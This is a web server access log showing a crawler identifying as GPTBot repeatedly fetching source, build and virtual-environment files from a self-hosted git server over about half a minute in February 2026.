"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13921] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13923] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 13923] [Gzip 8.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" [Client 74.7.227.38] [Length 2693] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:16:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11373] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13015] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:16:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 74.7.227.38] [Length 19902] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:16:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:16:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:16:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:16:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:16:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 22050] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:16:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:16:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:16:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:16:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations?q=&sort=newest" [Client 74.7.227.38] [Length 5075] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/organizations" +[17/Feb/2026:16:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users?q=&sort=alphabetically" [Client 74.7.227.38] [Length 5470] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/users" +[17/Feb/2026:16:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations?q=&sort=oldest" [Client 74.7.227.38] [Length 5084] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/organizations" +[17/Feb/2026:16:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=name&state=open" [Client 74.7.227.38] [Length 8485] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:16:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fglobal.json" [Client 74.7.227.38] [Length 21300] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" +[17/Feb/2026:16:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 12204] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:16:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:16:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=name&state=closed" [Client 74.7.227.38] [Length 8498] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=name&state=open" +[17/Feb/2026:16:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" +[17/Feb/2026:16:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" +[17/Feb/2026:16:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10859] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:16:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11191] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13304] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs?display=source" [Client 74.7.227.38] [Length 12201] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" +[17/Feb/2026:16:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs?display=source" [Client 74.7.227.38] [Length 11587] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:16:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11552] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:16:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11544] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:16:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=name&state=open" [Client 74.7.227.38] [Length 8481] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=name&state=closed" +[17/Feb/2026:16:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:16:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr 